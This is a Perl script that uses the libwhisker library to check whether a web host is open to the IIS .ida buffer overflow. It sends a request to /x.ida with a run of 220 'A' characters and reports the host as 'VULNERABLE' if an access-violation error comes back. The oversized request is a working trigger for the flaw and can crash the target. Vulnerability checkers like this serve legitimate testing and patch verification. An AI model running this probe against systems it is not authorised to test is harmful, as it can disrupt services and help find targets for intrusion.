#!/usr/bin/perl
###############

# ida_overflow.pl - HDM <hdm@digitaloffense.net>
# most of the code (including libwhisker) by RFP <rfp@wiretrip.net>

# template ripped from apache3.pl

# to use this you need libwhisker-pr3 or newer

BEGIN {

    if (eval "require libwhisker") {
        lw->import();
    } else {
        print "Error: this script requires libwhisker.\n";
        print "\tdownload it and place in the same directory as this script:\n";
        print "\turl => http://www.wiretrip.net/rfp/bins/libwhisker/pr3/libwhisker.pm\n";  
        exit;
    }
}

use libwhisker;
use Getopt::Std;

$|++;

my (%hin,%hout,%args);

getopts("p:P:R:h:s",\%args);

if($args{h} eq ''){
 print 'Usage: $0 <options>, where options:',"\n";
 print '-h host  host to check (must be specified)',"\n";
 print '-p ##	 host port (default: 80)',"\n";
 print '-P host	 HTTP proxy via host',"\n";
 print '-R ##	 HTTP proxy port (default: 80)',"\n";
 print '-s	 use SSL (can\'t be used with proxy)',"\n";
 exit 0;
}

&lw::http_init_request(\%hin);		# setup our request hash

$hin{'whisker'}->{'host'}= $args{h};

$hin{'whisker'}->{'port'}= $args{p} || 80;

if(defined $args{s}){
 	$hin{'whisker'}->{'ssl'} = 1; 

	if(defined $args{P}){
		print "SSL not currently compatible with proxy\n";
		exit 1; 
	}
}

if(defined $args{'P'}){
	$hin{'whisker'}->{'proxy_host'}=$args{P};
	$hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
	print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
	print "port $hin{'whisker'}->{'proxy_port'}\n";
}


&lw::http_fixup_request(\%hin);		# fix any HTTP requirements


$hin{'whisker'}->{'uri'} = "/x.ida?" . ("A" x 220) . "=x";

if(&lw::http_do_request(\%hin,\%hout)){
	print "Error: $hout{'whisker'}->{'error'}\n";
	exit 1;
} else {
    # error 0xc0000005 == "Access Violation"
	if ($hout{'whisker'}->{'data'}=~/c0000005/){
		print $args{h} . " IS VULNERABLE\n";
		exit 0;
	} else {
        print $args{h} . " IS PATCHED\n";
    }
}